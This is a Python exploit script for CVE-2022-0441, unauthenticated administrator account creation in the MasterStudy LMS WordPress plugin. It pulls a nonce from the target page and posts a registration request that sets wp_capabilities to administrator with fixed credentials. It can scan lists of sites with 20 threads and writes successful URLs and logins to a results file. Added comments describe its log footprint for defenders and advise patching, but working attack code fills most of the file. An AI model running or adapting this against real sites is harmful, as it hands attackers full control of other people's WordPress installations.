# @author : biulove0x
# @name : WP Plugins Master Study Exploiter
# @tg : @biulove0x
from cmath import exp
from urllib3.exceptions import InsecureRequestWarning
import concurrent.futures
import requests, re, argparse
# Startup banner. This runs at import time, before any argument parsing,
# so it is printed even when the module is only imported.
print(
    '\n'
    '###############################################\n'
    '# @author : biulove0x #\n'
    '# @name : WP Plugins Master Study Exploiter #\n'
    '# @cve : CVE-2022-0441 #\n'
    '###############################################\n'
)
# masterstudy(_target, _timeout=5): probe one site and send the registration
# request this tool is built around. The file's banner and argparse description
# label it CVE-2022-0441, unauthenticated admin account creation in the
# MasterStudy LMS WordPress plugin.
#   _target  - base URL; it is concatenated directly with 'wp-admin/...' below,
#              so it presumably has to end in '/' (no normalisation is visible).
#   _timeout - per-request timeout in seconds handed to requests (default 5).
# No return statement is visible, so a call yields None; outcomes are reported
# through print() and appended to RESULT-WPMS.txt.
#
# For defenders, the observable footprint of this routine is:
#   - a GET of the supplied URL followed by a POST to
#     wp-admin/admin-ajax.php?action=stm_lms_register&nonce=<value>;
#   - a POST body containing "profile_default_fields_for_register" with a
#     "wp_capabilities" entry;
#   - the fixed User-Agent string set in _headers;
#   - a new WordPress user named 'biulove0xpentest' with an
#     '@domainexample.com' address.
# Sites running the affected plugin should be updated and their administrator
# list audited for accounts registered through this endpoint.
# NOTE(review): confirm the fixed plugin release against the vendor advisory;
# this file only names 2.7.5.
def masterstudy(_target, _timeout=5):
_sessionget = requests.Session()
# Static browser-like User-Agent sent with both requests; usable as a weak log indicator.
_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
}
# Appends one line to RESULT-WPMS.txt in the current working directory.
# NOTE(review): the handle is never closed explicitly, and on the success path
# the line written holds the target URL plus the created credentials in plain text.
def save_result(_result):
_saved = open('RESULT-WPMS.txt', 'a+')
_saved.write(_result + '\n')
try:
# TLS certificate verification is disabled for this GET (verify=False), so the
# response is not authenticated as coming from the named host.
_validationPlugins = _sessionget.get(url=_target, headers=_headers, allow_redirects=True, verify=False, timeout=_timeout)
# The presence of this string in the page body is the only plugin check performed.
if 'stm_lms_register' in _validationPlugins.text:
# Collects every value that follows stm_lms_register":" in the page; only the
# first match is used when the POST URL is built.
_getnonce = re.compile('stm_lms_register":"(.*?)(?:")')
_findnonce = _getnonce.findall(_validationPlugins.text)
# Hard-coded registration body: fixed login, e-mail and password, plus a
# wp_capabilities entry that asks for the administrator role.
_data = '{"user_login":"biulove0xpentest","user_email":"biulove0xpentest@domainexample.com","user_password":"biulove0xpentest","user_password_re":"biulove0xpentest","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}'
_postExploit = _sessionget.post(url=_target + 'wp-admin/admin-ajax.php?action=stm_lms_register&nonce=' + _findnonce[0], headers=_headers, allow_redirects=True, data=_data, timeout=_timeout)
# Success is inferred purely from two substrings in the response text.
if '"status":"success"' in _postExploit.text and '"message":"' in _postExploit.text:
print('[-] ' + _target + 'wp-admin/ => Success')
_dataresult = _target + 'wp-admin/ | biulove0xpentest | biulove0xpentest'
save_result(_dataresult)
else:
print('[*] ' + _target + ' => Failed, try manual')
# NOTE(review): indentation is lost on this page, so it is unclear whether the
# next line belongs only to the 'Failed' branch or runs after both branches.
save_result(_target)
else:
print('[+] ' + _target + ' Not found!')
# Bare except: any exception raised above, not only network errors, is reported
# as 'Requests failed'.
except:
print('[%] ' + _target + ' Requests failed')
# main(_choose, _target): dispatch on the mode selected by the command-line
# handling at the bottom of the file.
#   _choose == 1  -> _target is a single URL, passed straight to masterstudy().
#   _choose == 2  -> _target is a path to a file; its contents are split on
#                    whitespace and each token is submitted to a 20-worker
#                    thread pool running masterstudy().
#   anything else -> exit().
def main(_choose, _target):
if _choose == 1:
masterstudy(_target)
elif _choose == 2:
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
# NOTE(review): the list file is opened without a context manager and is never
# closed explicitly.
_ur_list = open(_target, 'r').read().split()
_futures = []
for _url in _ur_list:
_futures.append(executor.submit(masterstudy, _target=_url))
# masterstudy() has no visible return statement, so result() is presumably
# always None and this print never fires; result() would also re-raise any
# exception that escaped the worker.
for _future in concurrent.futures.as_completed(_futures):
if(_future.result() is not None):
print(_future.result())
else:
exit()
# Silence urllib3's InsecureRequestWarning. masterstudy() sends its GET with
# verify=False, which would otherwise emit this warning on every request.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Command-line interface: -t takes one target URL, -l takes a file of targets.
# Parsing happens at import time, outside the __main__ guard.
_parser = argparse.ArgumentParser(
    description='CVE-2022-0441 [ WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation ]',
)
_parser.add_argument('-t', metavar='example.com', type=str, help='Single target')
_parser.add_argument('-l', metavar='target.txt', type=str, help='Multiple target')
_args = _parser.parse_args()

# Both values are None when the corresponding option was not supplied.
_singleTarget = _args.t
_multiTarget = _args.l

if __name__ == '__main__':
    # -t takes precedence when both options are given.
    if _singleTarget is not None:
        _choose = 1
        main(_choose, _singleTarget)
    elif _multiTarget is not None:
        _choose = 2
        main(_choose, _multiTarget)
    else:
        print('MasterStudy.py --help for using tools')